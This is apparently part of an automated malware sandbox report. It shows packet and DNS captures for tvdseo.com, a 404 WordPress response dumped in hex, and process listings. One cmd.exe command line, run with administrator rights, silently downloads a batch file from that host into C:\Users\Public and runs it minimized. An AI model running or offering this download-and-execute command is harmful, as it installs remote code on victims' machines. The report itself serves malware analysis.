                                Nov 25, 2024 18:01:27.597836971 CET49703443192.168.2.7104.21.81.137
                                Nov 25, 2024 18:01:27.601851940 CET44349703104.21.81.137192.168.2.7
                                Nov 25, 2024 18:01:27.601908922 CET49703443192.168.2.7104.21.81.137
                                Nov 25, 2024 18:01:27.606153965 CET44349703104.21.81.137192.168.2.7
                                Nov 25, 2024 18:01:27.606209993 CET49703443192.168.2.7104.21.81.137
                                Nov 25, 2024 18:01:27.606257915 CET44349703104.21.81.137192.168.2.7
                                Nov 25, 2024 18:01:27.606307983 CET49703443192.168.2.7104.21.81.137
                                Nov 25, 2024 18:01:27.606363058 CET44349703104.21.81.137192.168.2.7
                                Nov 25, 2024 18:01:27.606501102 CET44349703104.21.81.137192.168.2.7
                                Nov 25, 2024 18:01:27.606563091 CET49703443192.168.2.7104.21.81.137
                                Nov 25, 2024 18:01:27.615763903 CET49703443192.168.2.7104.21.81.137
                                Nov 25, 2024 18:01:27.615775108 CET44349703104.21.81.137192.168.2.7

                                UDP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Nov 25, 2024 18:01:24.546983004 CET6062353192.168.2.71.1.1.1
                                Nov 25, 2024 18:01:24.685667038 CET53606231.1.1.1192.168.2.7

                                DNS Queries

                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                Nov 25, 2024 18:01:24.546983004 CET192.168.2.71.1.1.10xacc3Standard query (0)tvdseo.comA (IP address)IN (0x0001)false

                                DNS Answers

                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                Nov 25, 2024 18:01:24.685667038 CET1.1.1.1192.168.2.70xacc3No error (0)tvdseo.com104.21.81.137A (IP address)IN (0x0001)false
                                Nov 25, 2024 18:01:24.685667038 CET1.1.1.1192.168.2.70xacc3No error (0)tvdseo.com172.67.189.157A (IP address)IN (0x0001)false

                                HTTP Request Dependency Graph

                                • tvdseo.com

                                HTTPS Proxied Packets

                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.749703104.21.81.1374435916C:\Windows\SysWOW64\curl.exe
                                TimestampBytes transferredDirectionData
                                2024-11-25 17:01:26 UTC87OUTGET /file/quan.bat HTTP/1.1
                                Host: tvdseo.com
                                User-Agent: curl/7.83.1
                                Accept: */*
                                2024-11-25 17:01:26 UTC1083INHTTP/1.1 404 Not Found
                                Date: Mon, 25 Nov 2024 17:01:26 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: close
                                x-powered-by: PHP/8.2.15
                                expires: Wed, 11 Jan 1984 05:00:00 GMT
                                cache-control: no-cache, must-revalidate, max-age=0
                                link: <https://tvdseo.com/wp-json/>; rel="https://api.w.org/"
                                vary: Accept-Encoding
                                platform: hostinger
                                panel: hpanel
                                content-security-policy: upgrade-insecure-requests
                                x-turbo-charged-by: LiteSpeed
                                cf-cache-status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nvEicoSiJDmB7Y12x6ziuTJeaIUpVBDygvw6DEwaKrs7dK7%2B7cZzJIvvg7Fp1CiMmSsBnAC0n%2Bf1Vxjc3rEWpZ9cWbvlmqOvuCln4fcZY197F64mB5CRw8OHYw%2Bz"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 8e83335fdaa0422b-EWR
                                alt-svc: h3=":443"; ma=86400
                                server-timing: cfL4;desc="?proto=TCP&rtt=2178&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2823&recv_bytes=725&delivery_rate=1332116&cwnd=234&unsent_bytes=0&cid=f60b1835723be41a&ts=887&x=0"
                                2024-11-25 17:01:26 UTC286INData Raw: 36 61 30 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 76 69 22 20 63 6c 61 73 73 3d 22 6c 6f 61 64 69 6e 67 2d 73 69 74 65 20 6e 6f 2d 6a 73 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 76 64 73 65 6f 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 20 2f 3e 0a 0a 09 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 68 74 6d 6c 29 7b 68 74 6d 6c 2e 63 6c 61 73 73 4e 61 6d
                                Data Ascii: 6a04<!DOCTYPE html><html lang="vi" class="loading-site no-js"><head><meta charset="UTF-8" /><link rel="profile" href="https://gmpg.org/xfn/11" /><link rel="pingback" href="https://tvdseo.com/xmlrpc.php" /><script>(function(html){html.classNam
                                2024-11-25 17:01:26 UTC1369INData Raw: 6f 2d 6a 73 5c 62 2f 2c 27 6a 73 27 29 7d 29 28 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 3c 21 2d 2d 20 43 68 e1 ba bf 20 c4 91 e1 bb 99 20 c4 91 e1 bb 93 6e 67 20 c3 bd 20 47 6f 6f 67 6c 65 20 74 61 67 20 28 67 74 61 67 2e 6a 73 29 20 64 61 74 61 4c 61 79 65 72 20 c4 91 c6 b0 e1 bb a3 63 20 74 68 c3 aa 6d 20 62 e1 bb 9f 69 20 53 69 74 65
                                Data Ascii: o-js\b/,'js')})(document.documentElement);</script><meta name='robots' content='noindex, follow' /><meta name="viewport" content="width=device-width, initial-scale=1" />... Ch ng Google tag (gtag.js) dataLayer c thm bi Site
                                2024-11-25 17:01:26 UTC1369INData Raw: 49 22 2c 22 46 52 22 2c 22 47 42 22 2c 22 47 52 22 2c 22 48 52 22 2c 22 48 55 22 2c 22 49 45 22 2c 22 49 53 22 2c 22 49 54 22 2c 22 4c 49 22 2c 22 4c 54 22 2c 22 4c 55 22 2c 22 4c 56 22 2c 22 4d 54 22 2c 22 4e 4c 22 2c 22 4e 4f 22 2c 22 50 4c 22 2c 22 50 54 22 2c 22 52 4f 22 2c 22 53 45 22 2c 22 53 49 22 2c 22 53 4b 22 5d 2c 22 77 61 69 74 5f 66 6f 72 5f 75 70 64 61 74 65 22 3a 35 30 30 7d 3c 2f 73 63 72 69 70 74 3e 0a 3c 21 2d 2d 20 4b e1 ba bf 74 20 74 68 c3 ba 63 20 74 68 e1 ba bb 20 47 6f 6f 67 6c 65 20 28 67 74 61 67 2e 6a 73 29 20 63 68 e1 ba bf 20 c4 91 e1 bb 99 20 c4 91 e1 bb 93 6e 67 20 c3 bd 20 64 61 74 61 4c 61 79 65 72 20 c4 91 c6 b0 e1 bb a3 63 20 74 68 c3 aa 6d 20 62 e1 bb 9f 69 20 53 69 74 65 20 4b 69 74 20 2d 2d 3e 0a 09 09 09 0a 09 3c 21
                                Data Ascii: I","FR","GB","GR","HR","HU","IE","IS","IT","LI","LT","LU","LV","MT","NL","NO","PL","PT","RO","SE","SI","SK"],"wait_for_update":500}</script>... Kt thc th Google (gtag.js) ch ng dataLayer c thm bi Site Kit --><!
                                2024-11-25 17:01:26 UTC1369INData Raw: 63 74 22 2c 22 69 6e 4c 61 6e 67 75 61 67 65 22 3a 22 76 69 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 74 76 64 73 65 6f 2e 63 6f 6d 2f 23 2f 73 63 68 65 6d 61 2f 6c 6f 67 6f 2f 69 6d 61 67 65 2f 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 74 76 64 73 65 6f 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 33 2f 63 72 6f 70 70 65 64 2d 4c 4f 47 4f 2d 54 56 44 2d 53 45 4f 2d 56 55 4f 4e 47 2e 70 6e 67 22 2c 22 63 6f 6e 74 65 6e 74 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 74 76 64 73 65 6f 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 33 2f 63 72 6f 70 70 65 64 2d 4c 4f 47 4f 2d 54 56 44 2d 53 45 4f 2d 56 55 4f 4e 47 2e 70 6e 67 22 2c 22 77 69 64 74 68 22 3a
                                Data Ascii: ct","inLanguage":"vi","@id":"https://tvdseo.com/#/schema/logo/image/","url":"https://tvdseo.com/wp-content/uploads/2023/03/cropped-LOGO-TVD-SEO-VUONG.png","contentUrl":"https://tvdseo.com/wp-content/uploads/2023/03/cropped-LOGO-TVD-SEO-VUONG.png","width":
                                2024-11-25 17:01:26 UTC1369INData Raw: 6c 65 3d 22 44 e1 bb 8b 63 68 20 56 e1 bb a5 20 53 45 4f 20 20 26 72 61 71 75 6f 3b 20 44 c3 b2 6e 67 20 62 c3 ac 6e 68 20 6c 75 e1 ba ad 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 76 64 73 65 6f 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72
                                Data Ascii: le="Dch V SEO &raquo; Dng bnh lun" href="https://tvdseo.com/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUr
                                2024-11-25 17:01:26 UTC1369INData Raw: 62 5c 75 64 62 34 30 5c 75 64 63 37 66 22 29 3b 63 61 73 65 22 65 6d 6f 6a 69 22 3a 72 65 74 75 72 6e 21 6e 28 65 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62 61 6c 53 63 6f 70 65 26 26 73 65 6c 66 20 69 6e 73 74 61 6e 63 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62 61 6c 53 63 6f 70 65 3f 6e 65 77 20 4f 66 66 73 63 72 65 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c
                                Data Ascii: b\udb40\udc7f");case"emoji":return!n(e,"\ud83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),
                                2024-11-25 17:01:26 UTC1369INData Raw: 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 20 69 6e 20 65 29 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 3d 3d 74 26 26 28 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 29 3b 6e 2e 73 75 70 70 6f 72 74
                                Data Ascii: te(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.support
                                2024-11-25 17:01:26 UTC1369INData Raw: 2d 66 61 6d 69 6c 79 3a 20 27 47 6f 6f 67 6c 65 53 61 6e 73 27 3b 0a 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 09 73 72 63 3a 20 75 72 6c 28 27 68 74 74 70 73 3a 2f 2f 74 76 64 73 65 6f 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 34 2f 30 39 2f 47 6f 6f 67 6c 65 53 61 6e 73 2d 42 6f 6c 64 2e 74 74 66 27 29 20 66 6f 72 6d 61 74 28 27 74 72 75 65 74 79 70 65 27 29 3b 0a 7d 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 47 6f 6f 67 6c 65 53 61 6e 73 27 3b 0a 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 09 73 72 63 3a 20 75 72 6c 28 27 68 74 74 70 73 3a 2f 2f 74 76 64 73 65 6f 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32
                                Data Ascii: -family: 'GoogleSans';font-weight: 700;src: url('https://tvdseo.com/wp-content/uploads/2024/09/GoogleSans-Bold.ttf') format('truetype');}@font-face {font-family: 'GoogleSans';font-weight: 400;src: url('https://tvdseo.com/wp-content/uploads/202
                                2024-11-25 17:01:26 UTC1369INData Raw: 23 37 61 30 30 64 66 3b 2d 2d 77 70 2d 62 6c 6f 63 6b 2d 73 79 6e 63 65 64 2d 63 6f 6c 6f 72 2d 2d 72 67 62 3a 31 32 32 2c 30 2c 32 32 33 3b 2d 2d 77 70 2d 62 6f 75 6e 64 2d 62 6c 6f 63 6b 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 77 70 2d 62 6c 6f 63 6b 2d 73 79 6e 63 65 64 2d 63 6f 6c 6f 72 29 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 3a 72 6f 6f 74 7b 2d 2d 77 70 2d 61 64 6d 69 6e 2d 62 6f 72 64 65 72 2d 77 69 64 74 68 2d 66 6f 63 75 73 3a 31 2e 35 70 78 7d 7d 2e 77 70 2d 65 6c 65 6d 65 6e 74 2d 62 75 74 74 6f 6e 7b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 3a 72 6f 6f 74 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6e 6f 72 6d 61 6c 3a 31 36 70 78 3b 2d 2d 77 70 2d
                                Data Ascii: #7a00df;--wp-block-synced-color--rgb:122,0,223;--wp-bound-block-color:var(--wp-block-synced-color)}@media (min-resolution:192dpi){:root{--wp-admin-border-width-focus:1.5px}}.wp-element-button{cursor:pointer}:root{--wp--preset--font-size--normal:16px;--wp-
                                2024-11-25 17:01:26 UTC1369INData Raw: 6e 74 2d 73 69 7a 65 3a 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 68 75 67 65 29 7d 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 63 65 6e 74 65 72 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 6c 65 66 74 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 72 69 67 68 74 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 72 69 67 68 74 7d 23 65 6e 64 2d 72 65 73 69 7a 61 62 6c 65 2d 65 64 69 74 6f 72 2d 73 65 63 74 69 6f 6e 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 61 6c 69 67 6e 63 65 6e 74 65 72 7b 63 6c 65 61 72 3a 62 6f 74 68 7d 2e 69 74 65 6d 73 2d 6a 75 73 74 69 66 69 65 64 2d 6c 65 66 74 7b 6a 75 73 74 69 66
                                Data Ascii: nt-size:var(--wp--preset--font-size--huge)}.has-text-align-center{text-align:center}.has-text-align-left{text-align:left}.has-text-align-right{text-align:right}#end-resizable-editor-section{display:none}.aligncenter{clear:both}.items-justified-left{justif


                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                Behavior

                                Click to jump to process

                                System Behavior

                                General

                                Target ID:0
                                Start time:12:01:23
                                Start date:25/11/2024
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\SysWOW64\cmd.exe" /c curl -s -o C:\Users\Public\UDkXtQleTB.bat https://tvdseo.com/file/quan.bat & start /min C:\Users\Public\UDkXtQleTB.bat
                                Imagebase:0x410000
                                File size:236'544 bytes
                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:1
                                Start time:12:01:23
                                Start date:25/11/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff75da10000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:2
                                Start time:12:01:23
                                Start date:25/11/2024
                                Path:C:\Windows\SysWOW64\curl.exe
                                Wow64 process (32bit):true
                                Commandline:curl -s -o C:\Users\Public\UDkXtQleTB.bat https://tvdseo.com/file/quan.bat
                                Imagebase:0xa50000
                                File size:470'528 bytes
                                MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate
                                Has exited:true

                                General

                                Target ID:9
                                Start time:12:01:26
                                Start date:25/11/2024
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\system32\cmd.exe /K C:\Users\Public\UDkXtQleTB.bat
                                Imagebase:0x410000
                                File size:236'544 bytes
                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:false

                                General

                                Target ID:10
                                Start time:12:01:26
                                Start date:25/11/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff75da10000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:false

                                Disassembly

                                No disassembly